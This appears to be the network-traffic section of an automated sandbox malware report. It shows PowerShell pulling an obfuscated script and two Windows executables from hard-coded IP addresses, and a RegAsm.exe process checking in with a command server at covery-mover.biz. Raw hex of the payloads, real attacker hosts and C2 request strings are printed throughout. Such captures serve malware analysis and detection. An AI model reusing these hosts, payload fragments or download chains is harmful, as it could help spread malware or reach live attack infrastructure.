                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Host: 45.131.135.227
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 07:52:05.471096992 CET1236INHTTP/1.1 200 OK
                                                                        Server: nginx/1.22.1
                                                                        Date: Thu, 12 Dec 2024 06:52:05 GMT
                                                                        Content-Type: application/octet-stream
                                                                        Content-Length: 2386
                                                                        Last-Modified: Tue, 10 Dec 2024 20:48:17 GMT
                                                                        Connection: keep-alive
                                                                        ETag: "6758a911-952"
                                                                        Accept-Ranges: bytes
                                                                        Data Raw: 0d 0a 24 77 42 36 61 6f 78 20 3d 20 27 34 5a 34 58 39 62 47 4d 6c 5a 4a 70 51 6f 6f 64 4d 43 5a 70 2f 5a 6c 63 52 61 72 48 42 45 72 2f 65 2b 41 71 67 54 30 37 44 6a 45 3d 27 0d 0a 24 63 33 70 49 53 72 20 3d 20 27 63 5a 41 6f 33 6c 78 58 6d 59 4c 73 47 33 6d 45 43 4e 61 77 4a 77 3d 3d 27 0d 0a 24 49 70 71 50 47 41 20 3d 20 27 30 4a 35 7a 46 52 2f 2f 35 57 35 46 6e 70 56 50 34 42 79 32 73 56 38 39 68 4e 59 79 4a 4f 77 73 6f 7a 45 67 6a 71 36 47 4c 45 59 71 73 6b 6c 6b 44 53 68 4e 37 51 46 50 4d 2b 58 67 73 37 4f 39 6b 63 57 50 41 76 34 4f 7a 69 31 55 76 66 67 66 67 67 37 38 49 71 43 58 77 48 34 32 71 62 59 78 33 67 63 63 41 71 4b 4d 54 6f 4c 41 73 41 71 77 6a 6c 68 41 33 76 76 5a 4d 71 4f 31 59 56 36 45 62 70 38 34 2f 6c 42 4e 55 31 6d 36 39 4c 4d 2f 4d 6a 71 67 4f 75 44 6b 53 6a 48 45 64 69 44 58 72 2b 70 64 66 65 79 32 78 45 66 54 68 74 7a 59 6d 64 39 42 62 62 35 52 66 36 4d 51 36 77 4b 2b 6a 4d 33 30 6c 47 45 41 4e 79 61 51 43 76 32 32 34 76 57 63 6f 2b 33 52 52 48 79 55 59 4e 56 45 4a 59 63 65 52 [TRUNCATED]
                                                                        Data Ascii: $wB6aox = '4Z4X9bGMlZJpQoodMCZp/ZlcRarHBEr/e+AqgT07DjE='$c3pISr = 'cZAo3lxXmYLsG3mECNawJw=='$IpqPGA = '0J5zFR//5W5FnpVP4By2sV89hNYyJOwsozEgjq6GLEYqsklkDShN7QFPM+Xgs7O9kcWPAv4Ozi1Uvfgfgg78IqCXwH42qbYx3gccAqKMToLAsAqwjlhA3vvZMqO1YV6Ebp84/lBNU1m69LM/MjqgOuDkSjHEdiDXr+pdfey2xEfThtzYmd9Bbb5Rf6MQ6wK+jM30lGEANyaQCv224vWco+3RRHyUYNVEJYceRsm8FW3zZUA5GVX2f8VDD/f/XMd1xIVbpq1WTEHH39nWw/yF9CdruTyh2zAHNvt47N7iiRs6twAZapwh2TFaz3B2So6YjgdwRJwaTeze2oZwS6w5q22Ue3vXjq5SXpTWyzfBhlgunA+GWzOSGozrANtHEFw2O9s8Z8qbhety7Sgrhcl/A8FRky3UcHu5LGN6d1sjr90hbCRBn160vrmrhyiFlY4u7OVvw17DfYycv5iwriaWCWibkyLIfD7S7yxycw6suHKnZBxqWBTvfGjoRJKdXXKTMYLZWBj2RPxa/xsKrWX9sJIOQSQtdpE2UnYN3e9KHZx/w4hTPAOnF4DqlgwwMy5gkfDRr/bJ2+EaNWokAeKdi9y1TbotZ4ru7p4wl6C9zjkcSnIurfED/Yh1smbTexybCJgI4GxeMQBz3y3wiq1PijbeJYAa0UDnDZvcdgIZrP0Nje0JCeTvRIJs70G8A8scRfcfuhJNkgP80l2GUL1dfQZvgYUVbDIKGG9NTlJgd06GfurHFD2sRqRd3fZx2R+hEAuJT3ZLfZ4Z2tZx15RzTXPrhhgwb+3KaCuGZ7p77k2hoFA5uNyonV3c9J48PhQ7XB1WzbueezjCFkMv4XSsBWvWIsjymmrjVIb5qVRYa
                                                                        Dec 12, 2024 07:52:05.471191883 CET224INData Raw: 45 34 4b 33 53 63 75 35 62 64 74 54 6c 6c 79 6e 45 52 6a 42 66 63 50 58 4b 50 78 61 68 56 6f 77 45 74 6f 50 6c 78 37 65 2b 64 43 38 70 55 6b 66 4a 58 53 4f 2b 4d 34 45 43 79 6e 30 59 49 77 77 32 4b 37 47 34 30 47 75 56 55 4c 42 72 50 48 62 2b 57
                                                                        Data Ascii: E4K3Scu5bdtTllynERjBfcPXKPxahVowEtoPlx7e+dC8pUkfJXSO+M4ECyn0YIww2K7G40GuVULBrPHb+WFt6rhfoceOZS8HdZ9HfnoTavhEwCmMLsphxunfA7aW1QMFypTdZstMcjYTJWG5tNDRWUHiPUFEu5Vf7toZDp07nGufg+gyiFNIUf6vE59xPmz2l+r9EAyaJMyiwDnm6N/VIdqV7wpIP8a+
                                                                        Dec 12, 2024 07:52:05.707577944 CET1180INData Raw: 32 53 43 6d 57 34 44 33 67 41 39 72 42 56 6d 76 36 55 57 7a 47 56 76 71 45 33 53 53 56 79 55 57 31 6e 52 71 64 4c 79 6d 4b 48 42 44 6c 35 61 59 34 4b 56 5a 69 4b 4c 39 6e 6d 33 6e 77 6a 4a 36 33 66 73 5a 72 62 69 47 73 56 53 47 59 6d 51 61 30 61
                                                                        Data Ascii: 2SCmW4D3gA9rBVmv6UWzGVvqE3SSVyUW1nRqdLymKHBDl5aY4KVZiKL9nm3nwjJ63fsZrbiGsVSGYmQa0aA76F4nSjxt3Zq6erOztQPTdODAFSep5AIAvZlKEOKYbIKF150KzzpG26tHLXTaPnnPTVElJm5Prh4iTPkCZxya0gTsnS2F90dBe21fLCet4YEmZLdnP+zHAI68qQxEGQlg7bSeGn5m9ceiALADv7numnFu3YHxgc4


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.449734147.45.44.131803616C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 07:52:06.541960001 CET180OUTGET /infopage/bhg8.exe HTTP/1.1
                                                                        X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                        Host: 147.45.44.131
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 07:52:07.811290026 CET1236INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 06:52:07 GMT
                                                                        Server: Apache/2.4.52 (Ubuntu)
                                                                        Last-Modified: Tue, 10 Dec 2024 18:23:51 GMT
                                                                        ETag: "b200-628ee95401970"
                                                                        Accept-Ranges: bytes
                                                                        Content-Length: 45568
                                                                        Keep-Alive: timeout=5, max=100
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-msdos-program
                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f2 35 5c c4 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 a4 00 00 00 0c 00 00 00 00 00 00 ee c3 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 9c c3 00 00 4f 00 00 00 00 e0 00 00 18 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 80 c3 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL5\"0 @ `O H.text `.rsrc@@.reloc@BH"0S(rp(o(r3p(os%oo~o~(*(*0(rp(o(~((osso(rp(oo&o(r-p(oo&o%oo(rWp(oo(rqp(oo%%o &
                                                                        Dec 12, 2024 07:52:07.811446905 CET1236INData Raw: 2a 1e 02 28 16 00 00 0a 2a 00 13 30 05 00 66 00 00 00 03 00 00 11 28 21 00 00 0a 03 6f 22 00 00 0a 0a 02 02 8e 69 17 59 91 1f 70 61 0b 02 8e 69 8d 20 00 00 01 0c 16 0d 16 13 04 2b 28 08 11 04 02 11 04 91 07 61 06 09 91 61 d2 9c 09 03 6f 23 00 00
                                                                        Data Ascii: *(*0f(!o"iYpai +(aao#Y3+XXiY2iY(+*(*(*(*(*0L(rp(o(rp(o(rp(o
                                                                        Dec 12, 2024 07:52:07.811464071 CET1236INData Raw: 00 00 00 00 92 00 3f 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 92 00 97 02 00 00 00 00 49 00 8e 00 00 00 00 4b 31 00 50 31 00 43 6f 6e 73 6f 6c 65 41 70 70 36 36 00 67 65 74 5f 55 54 46 38 00 3c 4d 6f 64 75 6c 65 3e 00 44 6f 77 6e 6c 6f
                                                                        Data Ascii: ?IK1P1ConsoleApp66get_UTF8<Module>DownloadDataEncryptDatamscorlibAddSystem.Collections.SpecializedGetMethodCompileAssemblyFromSourceget_BigEndianUnicodeInvokeGetTypeMethodBaseGuidAttributeD
                                                                        Dec 12, 2024 07:52:07.812125921 CET1236INData Raw: 00 00 00 31 57 00 43 00 31 00 54 00 63 00 47 00 56 00 6a 00 61 00 57 00 46 00 73 00 4c 00 55 00 68 00 6c 00 59 00 57 00 52 00 6c 00 63 00 67 00 3d 00 3d 00 00 80 d9 63 00 55 00 6c 00 75 00 65 00 44 00 68 00 47 00 4d 00 33 00 52 00 31 00 53 00 6b
                                                                        Data Ascii: 1WC1TcGVjaWFsLUhlYWRlcg==cUlueDhGM3R1SkRIWGdPRWZQSmpiYWlwWWFTRTFtb2JKMllSeW8ycmpOZ25WRGhKdmV2TjhSMmt1OG9QQ0JvbmhtcHpGYj
                                                                        Dec 12, 2024 07:52:07.812143087 CET1236INData Raw: 52 00 32 00 67 00 35 00 54 00 30 00 4d 00 79 00 5a 00 31 00 64 00 52 00 61 00 46 00 70 00 44 00 53 00 48 00 70 00 30 00 4c 00 30 00 4d 00 79 00 5a 00 31 00 64 00 52 00 61 00 46 00 70 00 44 00 52 00 57 00 74 00 4e 00 57 00 47 00 46 00 6e 00 64 00
                                                                        Data Ascii: R2g5T0MyZ1dRaFpDSHp0L0MyZ1dRaFpDRWtNWGFndFZRa1VXQTBJY1pVSi9ERUpSVUJZMmFReEFCMFFXTmxrOGFCWUZVQjRBRzBJUVhUOFdGRmNPRjFOWkpndF
                                                                        Dec 12, 2024 07:52:07.812849045 CET1236INData Raw: 56 00 54 00 65 00 6e 00 52 00 76 00 55 00 57 00 68 00 61 00 56 00 6b 00 70 00 6f 00 61 00 7a 00 64 00 68 00 51 00 6c 00 70 00 44 00 55 00 57 00 68 00 61 00 56 00 6b 00 70 00 72 00 53 00 56 00 64 00 46 00 52 00 6b 00 31 00 58 00 52 00 6a 00 42 00
                                                                        Data Ascii: VTenRvUWhaVkpoazdhQlpDUWhaVkprSVdFRk1XRjBRYkpneFRGUllSRmtRY2FBVnRQenRvUWhaVkprSVdRaFlaYnp4VkprSVdRaFpDUWhaVkprSVVDVk1RREZN
                                                                        Dec 12, 2024 07:52:07.812879086 CET1236INData Raw: 62 00 6c 00 6c 00 33 00 54 00 6c 00 4e 00 4e 00 61 00 31 00 46 00 4f 00 51 00 56 00 5a 00 4e 00 52 00 32 00 52 00 54 00 4f 00 56 00 52 00 45 00 4d 00 57 00 74 00 52 00 52 00 33 00 68 00 53 00 57 00 6b 00 4d 00 79 00 5a 00 31 00 64 00 52 00 61 00
                                                                        Data Ascii: bll3TlNNa1FOQVZNR2RTOVREMWtRR3hSWkMyZ1dRaFpDUWhaVkprSVdRaFpBT0VFZ2FBOVhFbUFMQjBFNllERlRBVUlMRFZoWEttODhRaFpDUWhaVkprSVdRaF
                                                                        Dec 12, 2024 07:52:07.813618898 CET1236INData Raw: 31 00 47 00 51 00 54 00 42 00 4a 00 55 00 55 00 78 00 70 00 64 00 46 00 6c 00 47 00 62 00 56 00 6c 00 58 00 52 00 55 00 4a 00 5a 00 51 00 6d 00 4a 00 6f 00 51 00 6c 00 52 00 42 00 4d 00 55 00 70 00 50 00 55 00 57 00 77 00 34 00 59 00 6d 00 4e 00
                                                                        Data Ascii: 1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFlsQjBJaWFS
                                                                        Dec 12, 2024 07:52:07.813647032 CET1236INData Raw: 56 00 6b 00 56 00 44 00 4d 00 45 00 6c 00 49 00 54 00 44 00 46 00 4e 00 57 00 57 00 46 00 53 00 51 00 6c 00 42 00 4b 00 62 00 45 00 31 00 50 00 51 00 6a 00 46 00 46 00 56 00 57 00 4e 00 6e 00 59 00 32 00 56 00 4c 00 4d 00 57 00 64 00 58 00 54 00
                                                                        Data Ascii: VkVDMElITDFNWWFSQlBKbE1PQjFFVWNnY2VLMWdXTWtJSEpoSkVEVlVIRVVWWkpndFlGaFlBQTBVUVJ3WlNFRk1SRVJwVlpCdENCMjAvUWxRQVlBUlRFQnBDQz
                                                                        Dec 12, 2024 07:52:07.814253092 CET1236INData Raw: 5a 00 72 00 59 00 57 00 46 00 72 00 53 00 6a 00 46 00 46 00 52 00 6b 00 31 00 45 00 52 00 6d 00 78 00 4e 00 62 00 47 00 52 00 42 00 4d 00 56 00 5a 00 43 00 4d 00 46 00 56 00 53 00 53 00 6d 00 78 00 4e 00 57 00 6c 00 6c 00 33 00 56 00 6c 00 68 00
                                                                        Data Ascii: ZrYWFrSjFFRk1ERmxNbGRBMVZCMFVSSmxNWll3VlhGbE5LRVVJSGJ3eFJRbGNTRWxvY1pRTkNDMWtNTEZjWVkwNFdFVUlRQzFnU0pnRlpEMXNEREZJNWJ3eFRU
                                                                        Dec 12, 2024 07:52:07.931004047 CET1236INData Raw: 4d 00 55 00 6c 00 74 00 51 00 6a 00 46 00 76 00 55 00 56 00 6c 00 52 00 54 00 6b 00 4e 00 43 00 65 00 46 00 6c 00 33 00 51 00 6a 00 42 00 56 00 51 00 57 00 46 00 33 00 5a 00 47 00 6c 00 44 00 61 00 31 00 46 00 49 00 51 00 54 00 46 00 4b 00 56 00
                                                                        Data Ascii: MUltQjFvUVlRTkNCeFl3QjBVQWF3ZGlDa1FIQTFKVk8wSjZEVmNHSTBZY09qQlRFVU1QQjJJZGRBZFhCbklIRGxNU1p4WlRYQjRsQjBJMGRndDRBMXNIRVI1Y1
                                                                        Dec 12, 2024 07:52:08.304292917 CET156OUTGET /infopage/ung0.exe HTTP/1.1
                                                                        X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                        Host: 147.45.44.131
                                                                        Dec 12, 2024 07:52:08.708161116 CET1236INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 06:52:08 GMT
                                                                        Server: Apache/2.4.52 (Ubuntu)
                                                                        Last-Modified: Tue, 10 Dec 2024 18:22:16 GMT
                                                                        ETag: "48e00-628ee8f9c1375"
                                                                        Accept-Ranges: bytes
                                                                        Content-Length: 298496
                                                                        Content-Type: application/x-msdos-program
                                                                        Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 05 00 ea b9 55 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 dc 03 00 00 ae 00 00 00 00 00 00 f0 87 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e1 0b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 05 00 78 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2c 0d [TRUNCATED]
                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELUg@p@0x9,.text `.rdata "@@.data P@.CRT R@@.relocx90:T@B
                                                                        Dec 12, 2024 07:52:09.833314896 CET1236INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 06:52:08 GMT
                                                                        Server: Apache/2.4.52 (Ubuntu)
                                                                        Last-Modified: Tue, 10 Dec 2024 18:22:16 GMT
                                                                        ETag: "48e00-628ee8f9c1375"
                                                                        Accept-Ranges: bytes
                                                                        Content-Length: 298496
                                                                        Content-Type: application/x-msdos-program
                                                                        Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 05 00 ea b9 55 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 dc 03 00 00 ae 00 00 00 00 00 00 f0 87 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e1 0b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 05 00 78 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2c 0d [TRUNCATED]
                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELUg@p@0x9,.text `.rdata "@@.data P@.CRT R@@.relocx90:T@B


                                                                        HTTPS Proxied Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.449737172.67.206.644437184C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-12 06:52:13 UTC263OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 8
                                                                        Host: covery-mover.biz
                                                                        2024-12-12 06:52:13 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                        Data Ascii: act=life
                                                                        2024-12-12 06:52:14 UTC1017INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 06:52:14 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=06sp25c8rb0mhdj5rselmb3t6t; expires=Mon, 07-Apr-2025 00:38:53 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ExCCknO%2BqxLEfZ9ksj6AzRoww%2FX1eND%2FWkY0A2foTW2qwA3toDSgpKRvh4hm1goI2O%2Fi%2F27VuI9HOTxcS8pV4tV4gmG7WE8o%2BIDCWPYpEgKLiydWvb%2BQ18w5Ssu03in6wIsF"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f0bca5a4c086a5e-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1688&min_rtt=1617&rtt_var=657&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=907&delivery_rate=1805813&cwnd=186&unsent_bytes=0&cid=b1cbfa9ca541f34c&ts=740&x=0"
                                                                        2024-12-12 06:52:14 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                        Data Ascii: 2ok
                                                                        2024-12-12 06:52:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.449738172.67.206.644437184C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-12 06:52:16 UTC264OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 47
                                                                        Host: covery-mover.biz
                                                                        2024-12-12 06:52:16 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 44 55 6b 67 4c 76 2d 2d 6f 74 64 65 6c 26 6a 3d
                                                                        Data Ascii: act=recive_message&ver=4.0&lid=DUkgLv--otdel&j=
                                                                        2024-12-12 06:52:16 UTC1009INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 06:52:16 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=lq4pudm5g35vmhkrhduk3r95cc; expires=Mon, 07-Apr-2025 00:38:55 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aLOhFWEqfP8owfBahHDV3A6pdOmSsps88gHmuxB9SOW3UoCblDXr8ZOB6XfOf%2Fzy8BxfSEjy4VVpI%2BycPwPro5mTk16qclja7HR5aU%2B09ZxmAQJp3X7UmxHMw3h6YLG5MnhJ"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f0bca6a199003d5-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1822&min_rtt=1818&rtt_var=685&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=947&delivery_rate=1606160&cwnd=226&unsent_bytes=0&cid=c04acdc08527c6f1&ts=733&x=0"
                                                                        2024-12-12 06:52:16 UTC360INData Raw: 31 64 33 32 0d 0a 65 56 38 37 30 4a 79 75 35 67 62 35 71 5a 71 38 48 31 7a 71 65 2b 6e 61 68 66 46 34 54 6f 50 39 6e 4e 69 57 4e 51 67 62 33 72 45 43 66 55 33 79 70 70 72 4b 4a 49 72 4d 75 49 5a 72 4c 70 38 65 78 66 6a 6b 6c 56 70 30 35 5a 7a 77 71 2f 4d 5a 4b 6d 32 7a 6b 30 4d 35 57 72 7a 76 79 38 6f 6b 6e 4e 47 34 68 6b 51 6e 79 42 36 48 2b 4c 2f 54 48 53 54 68 6e 50 43 36 39 31 35 6e 61 37 4c 53 45 54 4e 63 75 50 6e 4e 67 6d 65 56 78 50 2f 5a 65 6a 32 41 46 59 43 33 37 5a 78 61 59 71 47 59 35 76 71 73 46 30 56 2b 71 74 41 30 50 6b 69 37 76 74 50 4b 66 64 76 4d 39 4a 34 6c 66 6f 73 65 69 37 62 6a 6c 52 4d 6d 36 35 58 34 75 2f 4a 66 65 48 4b 34 32 52 45 39 58 37 6e 7a 78 4a 5a 71 6e 38 50 30 33 33 41 39 79 46 66 4c 76 2f 2f 54 51 6d 79 79 72 66 32 72 35
                                                                        Data Ascii: 1d32eV870Jyu5gb5qZq8H1zqe+nahfF4ToP9nNiWNQgb3rECfU3ypprKJIrMuIZrLp8exfjklVp05Zzwq/MZKm2zk0M5Wrzvy8oknNG4hkQnyB6H+L/THSThnPC6915na7LSETNcuPnNgmeVxP/Zej2AFYC37ZxaYqGY5vqsF0V+qtA0Pki7vtPKfdvM9J4lfosei7bjlRMm65X4u/JfeHK42RE9X7nzxJZqn8P033A9yFfLv//TQmyyrf2r5
                                                                        2024-12-12 06:52:16 UTC1369INData Raw: 44 7a 32 32 38 31 67 52 53 47 75 4f 71 5a 46 53 2f 68 6d 50 53 77 2b 31 31 75 64 4c 48 56 47 7a 30 5a 2f 4c 37 4c 6e 43 54 44 69 39 76 62 62 54 6d 45 44 38 6d 43 70 34 78 55 4e 61 47 59 38 76 71 73 46 32 4a 38 76 39 41 51 4d 6c 71 36 39 64 36 45 64 70 33 47 2f 63 78 37 4f 34 59 54 69 4b 72 74 6e 52 77 76 36 4a 54 33 76 2f 4e 54 4b 6a 66 38 31 41 4e 39 41 66 4c 66 77 59 39 6f 6b 64 7a 34 6e 6d 4a 77 6b 56 6d 4d 74 4b 66 4c 57 69 6a 67 6d 2f 2b 2b 2b 6c 6c 75 64 62 72 64 46 6a 4a 66 75 50 37 4c 6a 6d 79 54 79 76 58 56 63 6a 36 4e 46 49 2b 2b 36 35 49 66 62 4b 2f 66 2b 61 4b 30 44 79 70 58 75 39 41 4a 66 32 79 78 38 4d 4b 44 63 74 76 55 74 73 63 39 4f 59 52 5a 30 2f 6a 70 6c 68 55 2b 34 49 33 37 74 4f 5a 62 62 33 2b 78 30 42 55 39 58 4c 58 7a 77 6f 4a 6a 6d
                                                                        Data Ascii: Dz2281gRSGuOqZFS/hmPSw+11udLHVGz0Z/L7LnCTDi9vbbTmED8mCp4xUNaGY8vqsF2J8v9AQMlq69d6Edp3G/cx7O4YTiKrtnRwv6JT3v/NTKjf81AN9AfLfwY9okdz4nmJwkVmMtKfLWijgm/+++lludbrdFjJfuP7LjmyTyvXVcj6NFI++65IfbK/f+aK0DypXu9AJf2yx8MKDctvUtsc9OYRZ0/jplhU+4I37tOZbb3+x0BU9XLXzwoJjm
                                                                        2024-12-12 06:52:16 UTC1369INData Raw: 39 4f 59 52 5a 30 2f 6a 71 6d 78 38 70 37 70 37 30 74 50 46 64 5a 6e 47 79 30 41 6b 79 58 62 4c 79 78 49 35 70 6c 63 2f 77 31 33 59 31 6a 68 6d 4b 73 71 66 64 57 69 76 35 33 36 62 36 77 46 42 6d 64 4c 4f 52 4c 6a 35 58 76 50 6e 61 78 48 76 56 30 72 6a 5a 63 58 37 51 57 59 65 78 35 35 67 51 4b 4f 47 59 38 37 2f 33 55 47 6c 30 75 39 6b 56 4f 6c 32 2b 39 38 47 43 5a 4a 7a 50 2f 63 78 34 4e 34 51 56 79 2f 61 6e 6c 41 4a 73 75 64 2f 52 76 65 4a 55 52 58 71 74 32 6c 73 69 46 36 75 2b 79 34 67 6b 77 34 76 2f 32 33 55 31 6a 68 47 4c 71 75 4b 64 45 53 33 72 6d 66 2b 33 2b 46 46 71 65 4c 7a 56 46 7a 31 65 74 65 7a 65 67 57 4b 4a 77 62 69 51 50 54 6d 51 57 64 50 34 30 59 4d 4e 50 66 66 64 79 37 6e 36 57 57 31 76 2f 4d 78 56 4a 42 6d 31 38 6f 7a 63 4a 4a 44 4c 39 4e
